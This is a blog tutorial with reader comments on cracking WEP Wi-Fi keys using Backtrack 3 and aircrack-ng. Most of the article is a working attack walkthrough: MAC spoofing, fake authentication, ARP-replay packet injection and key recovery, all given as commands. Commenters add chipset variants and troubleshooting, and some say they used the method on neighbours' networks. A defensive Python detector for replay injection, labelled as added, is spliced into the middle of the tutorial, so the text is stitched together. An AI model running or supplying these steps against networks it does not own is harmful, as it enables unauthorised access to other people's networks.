Standard Disclaimer: This article is provided for informational purposes only. thew0rd.com and its affiliates accept no liability for providing this information. Please only use to test configurations on your own equipment. Accessing WIFI networks that do not belong to you is ILLEGAL.

This article will explain how to crack 64-bit and 128-bit WEP on many WIFI access points and routers using Backtrack, a live Linux distribution. Your mileage may vary. The basic theory is that we want to connect to an Access Point using WEP encryption, but we do not know the key. We will attack the wifi router, making it generate packets for our cracking effort, and finally crack the WEP key. I have tested this technique on an IBM Thinkpad x60 and an Acer 5672, and the WIFI chipsets in those machines work for sure.

Requirements:

I will assume that you have downloaded and booted into Backtrack 3. If you haven’t figured that part out, you probably shouldn’t be trying to crack WEP keys. Once Backtrack is loaded, open a shell and do the following:

Preparing The WIFI Card

First we must enable “Monitor Mode” on the wifi card. If using the Intel® PRO/Wireless 3945ABG chipset, issue the following commands:

modprobe -r iwl3945

modprobe ipwraw
The above commands replace the stock iwl3945 driver with ipwraw, which supports monitor mode on this chipset. Next we must stop your WIFI card:

iwconfig
Take note of your wireless adapter’s interface name. Then stop the adapter by issuing:

airmon-ng stop [device]
Then:

ifconfig [interface] down
Now we must change the MAC address of the adapter:

macchanger --mac 00:11:22:33:44:66 [device]
It's now time to start the card in monitor mode by doing:

airmon-ng start [device]
(screenshot: airmon-ng start output)

Attacking The Target

It is now time to locate a suitable WEP enabled network to work with:

airodump-ng [device]
(screenshot: airodump-ng on wifi0)

Be sure to note the MAC address (BSSID), channel (CH) and name (ESSID) of the target network. Now we must start collecting data from the WIFI access point for the attack:

airodump-ng -c [channel] -w [network.out] --bssid [bssid] [device]

(screenshot: airodump-ng output)

The above command writes the collected data to the capture file network.out-01.cap (airodump-ng appends a sequence number to the prefix given with -w). This file will be fed into aircrack-ng when we are ready to crack the WEP key.

Open another shell and leave the previous command running. Now we need to inject packets to the access point to speed up the data collection. First, fake-authenticate with the access point so that it will accept frames from our spoofed MAC:

aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:66 -e [essid] [device]
(screenshot: aireplay-ng fake authentication)

If this command is successful, we can now generate many packets on the target network so that we can crack the key. Type:

aireplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device]
(screenshot: aireplay-ng generating IVs)

This ARP-request replay will force the access point to send out a bunch of packets, each carrying a fresh IV, which we can then use to crack the WEP key. Check your airodump-ng shell and you should see the “#Data” column filling up with packets.
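From the defender's side, the replay step above has a recognisable signature: aireplay-ng retransmits one captured, still-encrypted ARP request, so the injecting station emits the same (IV, frame length) pair at a rate no real client reaches. The following detector is an added example, not code from the original post; it runs over constructed 802.11 frame metadata, and the thresholds, the legitimate client MAC and the BSSID are assumptions (a real deployment would pull these fields from a monitor-mode capture).

```python
"""Detect WEP ARP-replay injection from 802.11 frame metadata (added example)."""
from collections import Counter, defaultdict

AP_BSSID = "00:21:21:21:21:21"    # constructed, borrowed from a commenter's example
INJECTOR = "00:11:22:33:44:66"    # the spoofed MAC used in the tutorial
CLIENT = "aa:bb:cc:00:00:01"      # constructed legitimate client


def build_sample_frames():
    """Return constructed (time, src, bssid, kind, length, iv) records."""
    frames = []
    # A real client: every WEP data frame carries a fresh IV and varying lengths.
    for i in range(40):
        frames.append((i * 0.05, CLIENT, AP_BSSID, "data", 120 + i % 7, 0x100000 + i))
    # The injector: fake authentication, then one ARP request replayed 300 times.
    frames.append((0.00, INJECTOR, AP_BSSID, "auth", 30, None))
    frames.append((0.01, INJECTOR, AP_BSSID, "assoc", 40, None))
    for i in range(300):
        frames.append((0.10 + i * 0.002, INJECTOR, AP_BSSID, "data", 68, 0xABCDEF))
    frames.sort(key=lambda r: r[0])
    return frames


def find_replay_sources(frames, window=1.0, min_repeats=50):
    """Map each station to the highest count of identical (IV, length) data
    frames it sent inside any `window`-second span; keep only stations at or
    above `min_repeats`. Ordinary WEP clients do not repeat an IV that often."""
    per_src = defaultdict(list)
    for t, src, _bssid, kind, length, iv in frames:
        if kind == "data" and iv is not None:
            per_src[src].append((t, iv, length))
    alerts = {}
    for src, recs in per_src.items():
        recs.sort()
        counts = Counter()
        worst, start = 0, 0
        for t, iv, length in recs:
            counts[(iv, length)] += 1
            # Slide the window: forget frames older than `window` seconds.
            while recs[start][0] < t - window:
                _, old_iv, old_len = recs[start]
                counts[(old_iv, old_len)] -= 1
                start += 1
            worst = max(worst, counts[(iv, length)])
        if worst >= min_repeats:
            alerts[src] = worst
    return alerts


def stations_that_authenticated(frames):
    """Stations seen sending an authentication or association request."""
    return {src for _t, src, _b, kind, _l, _iv in frames if kind in ("auth", "assoc")}


def report(frames):
    """Combine both signals: a replay burst plus a (fake) authentication."""
    replayers = find_replay_sources(frames)
    authed = stations_that_authenticated(frames)
    return {src: {"repeats": n, "authenticated": src in authed}
            for src, n in replayers.items()}


if __name__ == "__main__":
    for src, info in report(build_sample_frames()).items():
        print(f"ALERT {src}: {info['repeats']} identical frames within 1s, "
              f"authentication seen: {info['authenticated']}")
```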

(screenshot: captured IVs in airodump-ng)

After about 10,000-20,000 data packets you can begin cracking the WEP key. If there are no other hosts on the target access point generating packets, you can try:

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device]
(screenshot: aireplay-ng attack -2 with -p 0841)

Once you have enough packets, begin the crack:

aircrack-ng -n 128 -b [bssid] [filename]-01.cap

The “-n 128” signifies a 128-bit WEP key. If cracking fails, try a 64-bit key by changing the value after -n to 64.

(screenshot: aircrack-ng output)

Once the crack is successful you will be left with the KEY! Remove the colons from the output and there is your key. So there you have it.

You can use these techniques to demonstrate to others why using WEP is a bad idea. I suggest you use WPA2 encryption on your wireless networks. Good luck!

81 Responses to “Tutorial: Cracking WEP Using Backtrack 3”

  1. Emrikol says:

    Thanks Maz! You’re a lifesaver. I spent a while trying to do this with russix and I couldn’t get it. (Crazy mother-in-law is too cheap to buy internet, she moved, and her new place only has encrypted signals…luckily WEP)

  2. Anon says:

    or you could just buy your web access and not be fucking people over for bandwidth etc.

  3. nico says:

    Good tut. Next you might want to share with your readers about packet injection and Kismet for sniffing. I don’t know if they bundle Kismet with BT3 now but I know it was in BT2. Thanks

  4. Registered99 says:

    There is no macconfig?
    macconfig: command not found

  5. Maz says:

    @Registered99 Thanks for pointing out the mistake, the actual command is macchanger and I’m updating the post as I write this. Good luck!

  6. dubpluris says:

    Thanks a lot. I don’t really even plan on using this, but it was very informative and clear. Thanks for the effort.

  7. keen says:

    I personally do not worry if someone hacks into my router to go online. What worries me are the cases where the intentions go further: breaking into my desktop, or using my connection to do bad things, which would get me a surprise knock on the door by the FBI. This is a darn good reason I remain connected with troublesome hard wiring, or stick to the old b-version router.

  8. justgeig says:

    Just wondering what your thoughts are on hiding/not broadcasting the SSID… decently secure or no?

  9. Maz says:

    @justgeig if there are active clients on an AP with a hidden SSID, you can usually see it when running airodump-ng by comparing the MAC of the hidden AP with the MAC on packet captures. So generally, it doesn’t offer much more security. Might just be a speed bump in some situations.

  10. JodoKaast says:

    aircrack-ng also has the PTW algorithm attack, which needs far fewer IVs to successfully decrypt a WEP key. You can invoke it using the ‘-z’ switch with aircrack-ng. I’ve cracked a 128-bit WEP key with only about 40000 IVs.

  11. Nick says:

    I have done exactly as you said; my wifi chipset is Intel® PRO/Wireless 3945ABG.

    The problem is, after I use

    aireplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device]

    I get no packets from my access point. Then I use:

    aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device]

    After this I get many packets, but 50000 packets have only 1 IV.

    The access point I’m testing on is a Dynalink_Datron.

    Hope someone can help.

  12. jones says:

    Having trouble cracking the WEP key at my house. After performing this command aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device] the output for dest MAC is ff:ff:ff:ff:ff:ff, but according to your tutorial the dest MAC is the fake MAC. So when I try to decrypt the packets it fails looking for keys and says try with 5000 IVs.

  13. Maz says:

    @jones hey, check out the following site for more information about Interactive Packet Replay: http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay

    Hopefully that will give you a little more background and assist you in your efforts. Good luck!

  14. Goatse says:

    great tutorial, scary

  15. moosacha says:

    “aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device]”

    If you use interactive packet replay, wouldn’t you need to capture a lot more than just 20,000 packets in order to successfully attempt to crack? As far as I know what you’ll be capturing won’t be ARP packets, so the PTW method will not work for you. You’ll probably need to capture about 1,500,000 IVs before having a good chance of getting the key. Or am I mistaken?

  16. josh says:

    Hey, great tut, just one question: when I run the
    ifconfig down [wifi0] command I get an error, something like interface not found, but when I run airmon-ng stop [device] it says the interface is wifi0, so I’m pretty sure it’s the right interface; btw interface and device are the same thing on my machine. Oh, and last thing, how do you get out of monitor mode?

  17. croakey says:

    This tutorial is wonderful and worked for me!

    This line, however, needed the following changes to work for me.

    before:
    airodump-ng -c [channel] -w [network.out] –bssid [bssid] [device]

    after:
    airodump-ng -c [channel] -w [network.out] -–bssid [bssid] [device]

  18. Great tutorial! What would need to be modified in the code to get it to work with an Atheros chipset?

    I can’t quite figure it out.

  19. browncardboard says:

    For Atheros-based chipsets use ath_pci in place of the numbers for the modprobe command. I also had to remove the -r to get it to load, BUT I have no idea what I’m doing yet.

    Hope this helps someone

  20. This tutorial helped me a lot; it was the basis for me learning BT3. However, some of the above posts did not work for me. I am using an Atheros chipset, and some things had to be changed. Hope this helps someone.

    modprobe ath_pci

    modprobe ipwraw

    iwconfig

    airmon-ng stop ath0

    ifconfig wifi0 down

    macchanger --mac 00:11:22:33:44:66 wifi0

    airmon-ng start wifi0

    airodump-ng ath0
    gives available routers

    ******** cd /mnt/hda2/
    can do this to change the place to save the data
    airodump-ng -c 6 -w network.out --bssid 00:21:21:21:21:21 ath0
    collects shit

    aireplay-ng -1 0 -a 00:21:21:21:21:21 -h 00:11:22:33:44:66 -e "smokers suck" ath0
    must play around with this to get it on the same channel
    should get:
    15:56:18 Association successful :-) (AID: 1)

    aireplay-ng -3 -b 00:21:21:21:21:21 -h 00:11:22:33:44:66 ath0

    aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:21:21:21:21:21 -h 00:11:22:33:44:66 ath0

    cd /mnt/hda2 <- Used this to re-locate to the directory with the file
    aircrack-ng -n 128 -b 00:21:21:21:21:21 network.out-01.cap

  21. digitalfear says:

    Can I use the wifi wireless network card that’s in my laptop??

  22. Nedad says:

    Hi there

    I am new to Wifi and Linux. I have just been on Amazon to order books so I can read about Linux. They will be here in some days, but I can’t wait for some days.

    I am trying this tutorial and I get an error:
    bt ~ # modprobe -r iwl4965
    bt ~ # modprobe ipwraw
    bt ~ # iwconfig
    lo no wireless extensions.

    eth0 no wireless extensions.

    bt ~ #

    If I run “modprobe -r iwl4965” then iwconfig can’t find my wireless adapter and I can’t find the interface name.

    What am I missing here or doing wrong?

    Thanks
    Nedad

  23. Guest says:

    Take note of your wireless adapter’s interface name. Then stop the adapter by issuing:

    airmon-ng down [interface]

    What is the interface?
    All I can find is the device name.

    I get the error ‘host name lookup failure’.

    I think this is why my #data is staying at zero and beacon is at like 30000.

  24. Guest says:

    i got it all working i cant active attack, thanks for the great tutorial

  25. tuborg3110 says:

    Great tut. I also have a question, or 3 problems? 1.) Well, after this step: aireplay-ng -3 -b bssid -h 00:11:22:33:44:55 (device) there are a lot of read packets (100 000), but there are no ARP and ACK requests, and data is 0, or just a few, maybe 3 or 4 etc.
    So what’s the problem?
    2) Also, a lot of times this step doesn’t work: aireplay-ng -10 -a bssid -h 00:11:22:33:44:55 -e essid (device); after that there is no Authentication successful and Association successful. 3. The problem is next: after this aireplay-ng -3 -b bssid -h 00:11:22:33:44:55 (device), there are no ARP and ACKs, so with another laptop I tried to connect to the same secured network, and then ARP and ACK started.. but there is no data rising; only when I tried to connect with another laptop does data rise, but when I stop, Data also stops. And after maybe 50 000 IVs I can’t crack because that’s not enough IVs. Have you any solution, what can I do?

  26. tuborg3110 says:

    One more thing: there is no problem with the wireless card, because I tried with 5 different ones!!

  27. Talha says:

    How do I increase the speed of injecting packets??
    The #data column doesn’t rise very fast after injecting packets… it would take around 4 hours to rise to about 10000 packets… how do I make it rise faster??

    I am using an intel3495 card….

  28. XxLIL_NOYXX says:

    I’m getting a msg saying

    Fwrite(packet data) failed no more space on device
    fwrite(packet filter) failed no more space on device

    while collecting packets; after a while will it corrupt the packets collected???.. Help, how do I relocate where the data is sent??

  29. guest says:

    Can I run BackTrack 3 in Windows Vista? Please tell me how. Thanks.

  30. Maz says:

    @guest no. And the fact that you asked that question really shows how little you know. You should search Google, read, and learn more about what an operating system is and other computer basics before you try to go and crack WEP. You are obviously not going to crack WEP for any legitimate security purpose.

  31. nomoss says:

    Nice job on the tutorial. I am having some trouble with the airmon-ng and airodump-ng. The apps start but are not finding any data and seem unstable. The first few times they did find some networks. But now they don’t find anything. I have the same Centrino wireless card cited in the tutorial. Kismet is working fine and finding many networks. Any help would be appreciated. Z.

  32. Nice tutorial. Have tried this before but my Laptop’s wireless card is not compatible. Will be purchasing a new card soon as this is a neat trick to show our clients.

  33. blahhh2 says:

    For all of you people asking about ifconfig, it’s not

    ifconfig down [interface]

    is

    ifconfig [interface] down

    have a good day ;)

  34. godafather says:

    Great tut!
    But it doesn’t stop scanning the wireless networks!
    Help!

  35. Sindread says:

    thx m8, great tutorial; although I had some problems with it, after a few hours playing with it I succeeded in hacking the WEP key of the desired network… once again many thx 2 u and browncardboard who wrote the version for my card, based on the Atheros chipset.

  36. Doomsk8 says:

    Godafather,
    to stop the scanning just press:

    Ctrl + C keys; that’s to stop any activity in that shell console window. and…

    and… Maz… Thanks for everything. I didn’t try to type the modprobe commands, and still didn’t..

  37. Mike says:

    What Backtrack version specifically? 3 beta? or 3 final?

    I’m asking because I downloaded 3 final from the link you provided for the CD version and when it boots it’s not live, it’s just a terminal, and it works fine until I have to open a new shell, which I can’t or don’t know how to do.

    So in essence I’m wondering if my download is corrupt or if I downloaded the wrong version.

  38. DeJvid says:

    Hi everyone, I have a big question. I’m gonna buy a PCI Wireless Card (Belkin F5D900 Wireless G+ MIMO Desktop PCI Card) but the question is whether that card will be compatible with BackTrack3 for Aircracking. Has anyone used that kind of card before?

    That card is probably on the RT61 chipset. I’m not sure, thx for any answers.

  39. jacppe says:

    Hi all, I’m trying to inject packets to increase the data captures (to crack the WEP key); however the number of data never increases. I tried using the aireplay-ng command mentioned above with 3 APs (no MAC filtering) and it didn’t work.
    Thanks for your help

  40. This is a decent tutorial except that there are 2 typos in the listed commands to watch out for:
    “ifconfig down [interface]”
    should be:
    “ifconfig [interface] down”

    “airplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device]”
    should be:
    “aireplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device]”

    I am also having no luck with both methods of aireplay in getting packets.

  41. Ace says:

    OK, I understand the program and had no problem using it on my desktop, but I’m having a huge issue with it on my laptop… I’m guessing that my Intel(R) Wireless Wifi Link 5100 chipset is not compatible unless there is something I can do to fix it. Can someone recommend an external wireless card that I can use in the express card slot on my laptop? If so I would appreciate it if you would drop me an email at generalj14@yahoo.com

  42. exvivo says:

    Huh. I don’t know what’s going on.

    I took this screenshot at a couple hundred thousand IV’s. I let the program run further, and was at several million IV’s and aircrack would still fail to deliver me my WEP key.

    I must say, I’m pretty damn impressed with WEP encryption if it takes several days and billions of packets for Aircrack to deliver me my key.

    http://i43.tinypic.com/vpjeb8.jpg

  43. vze57gc8 says:

    I got stuck at:
    aireplay-ng -1 0 -a 00:00:00:00:00:00 -h 00:11:22:33:44:66 -e XXXXX ath0

    response:
    18:13:29 Waiting for beacon frame (BSSID: 00:00:00:00:00:00) on channel 1
    For the given BSSID “00:00:00:00:00:00”, there is an ESSID mismatch!
    Found ESSID “XXXX’X” vs. specified ESSID “XXXXX”
    Using the given one, double check it to be sure its correct!
    18:13:30 ath0 is on channel 1, but the AP uses channel 9

    Any idea on what to do?

  44. crackhead says:

    Worked like a charm, took me less than a minute to crack my neighbors WEP, now I can cancel my Internet service. Hehehe…

  45. gomika says:

    Hi there.

    Thanks for this tutorial, great job.
    However great a tutorial it is, I have a few problems, and I would really appreciate it if someone could help me.

    First of all there are a few typos in the tutorial.
    It says ifconfig down interface but the correct form is ifconfig interface down.
    No, I’m not a smart ass, but it took me 2 hours to realize that’s why I got the error message:)

    On the other hand, for some reason I cannot capture packets. I mean, I can see the traffic, but when I try to generate traffic there, basically nothing happens. Everything seems to be working fine but the packets don’t seem to be growing. Can anyone help me regarding this?

    I have tried this command: aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:66 -e [essid] [device]
    It is successful, but when I try to use this: aireplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device]

    OOOOORRRRRR this

    aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device]

    it seems like the numbers are growing, but not the IVs; data keeps counting painfully slowly, like 2 values up in an hour.

    It would be appreciated if someone could help me with what to do and how to do it.

    Cheers

    gomika

  46. commasbug says:

    Hey people! You are all talking about the BT3 WEP hack, but if after this step: aireplay-ng -3 -b bssid -h 00:11:22:33:44:55 (device) there are a lot of read packets (100 000), but there are no ARP and ACK requests, and data is 0, you will not be able to hack any WEP.

    Any Answer????

  47. Damocrian says:

    Maz said,

    11-16-2008 in 13:26:17 at 208.120.217.126 @guest
    …. You are obviously not going to crack WEP for any legitimate security purpose.

    ————————————————–

    What do you think most people do with this tutorial? 99% chance that people crack WEP for illegal purpose… I don’t understand your reasoning!

  48. Gregs says:

    Everything is good and helpful when the router has one name (demo). What should I do when the router has two names (one demo)? The aireplay-ng command does nothing if the router has two names!

  49. lew1s says:

    Hi commasbug,

    Can you help me with this ?
    I have no ARP. I am receiving many packets and data, but the ARP is still 0.

    thx

  50. UnanonymousGuy says:

    Nice tutorial, very helpful for a newb like me.
    Just got one problem/question. Upon cracking the key I get this:
    [01:01:01:01:01]
    How do I translate this to the actual WEP key?

  51. UnanonymousGuy says:

    Hmm, disregard that comment. It’s right there…. Hehehe

  52. Jeroendh says:

    I have the same problem as above:

    Can you help me with this ?
    I have no ARP. I am receiving many packets and data, but the ARP is still 0.

    thx

  53. nerrad862 says:

    I have an Intel Pro/Wireless 2915abg in a Dell Latitude D610 and when I type modprobe -r iwl2195 I get Module not found.

  54. quagmire says:

    Running an Atheros ar5b91 in a Gateway T-6330u & BT3 live (CD).. no adapter listed in BT’s wireless assistant.
    I assume a driver issue; considering the BT4 beta or the VM option… any suggestions? Please & thank you!

  55. ahmed says:

    i like this

  56. Anthony Cope says:

    This is great and all but people shouldn’t be screwing other people out of bandwidth like that!

  57. lenx says:

    I am using an Atheros AR9285 802.11b/n Wifi Adapter on Windows 7.. the wireless security in my location is unsecured. How can I crack the password?

    • Maz says:

      Lenx, You could start by reading the article above. Next you could learn Linux. Thirdly, if there is “unsecured wireless security” in your location as you state above, there is nothing to crack, as it’s unsecured. Remember, it’s illegal to use someone’s wireless without their permission.

      I suggest you just give up and go do something else.

    • Maz says:

      Actually I see you are in Kuala Lumpur, Malaysia. I’m not sure what the penalties are for stealing WIFI in Malaysia, but I could guess they are extreme.

  58. akiles says:

    Hello everyone, I have Backtrack 4 and what I found is that you do not need to do some of the codes, like putting it in monitor mode, and it doesn’t have to be an Atheros or an Intel Pro something something; it can be any wireless network adapter that you have. Still, some codes do the same thing. All you need is to download Backtrack 4 from a torrent or anywhere else and do what you have to do to make the evolution of hackers grow.

    • Maz says:

      Gee, thanks for stealing my entire post word for word on your site. Fucking idiot can’t even get the images to display properly. Asshole.

  59. I am using an Atheros AR9285 Wireless Network Adapter, but it is not displayed when I ran airmon-ng! – there are no wifi interfaces
    PS: I have bt3 on CD, maybe on bt4 it will work normally…
    PPS: Excuse me for my English

  60. kyle says:

    Is it possible for those of us that get to the final step that we are not receiving any data because the wireless router/AP we are accessing is actually not sending out any data? I.e. there is nobody connected to it?

    For example, if you are trying to connect to a company and nobody is actually using the wifi at the time you try to crack it?

  61. West says:

    Hi,

    this is a very easy question for you i think, but i cannot find an answer for it.

    Is it possible to get my EEE PC 1005PE with Atheros ar9285 into monitor mode?

    Thanks
    West

  62. yusmusuf says:

    Sir, I am using a Windows XP system with VirtualBox. I have a CD of bt-3 which I got with a Sky Dude router; now do I have to burn that CD or not? 2nd, I try to load it but it stopped at two lines at startup, asking “shall”, so now what do I have to do, and how will I get the router interface? It is USB2.0 mini USB so I have this name.
    I’m new in this field and I don’t have too much knowledge of computers, but I am learning through friends like you. Thanks.
    I hope I will get a reply soon.

  63. emad says:

    thank uuuuuuuuuuuuuuuuu

  64. mohammad says:

    Dear sir

    Please help me??

    Please send the software for the spoonwep hack for WEP, WPA, WPA2
    and the server attack for web site software

    Please send by email

    best regards
    Mohammad

  65. CHOONG says:

    Here is an article that explains WEP cracking thoroughly:

    I hacked my secure wireless network here’s how it’s done – TECH_BLORGE_com
    http://tech.blorge.com/Structure:%20/2007/02/06/i-hacked-my-wireless-network/

    P/S: Maz, sorry for insulting.


© 2010 Kyle Ingrelli. Suffusion WordPress theme by Sayontan Sinha.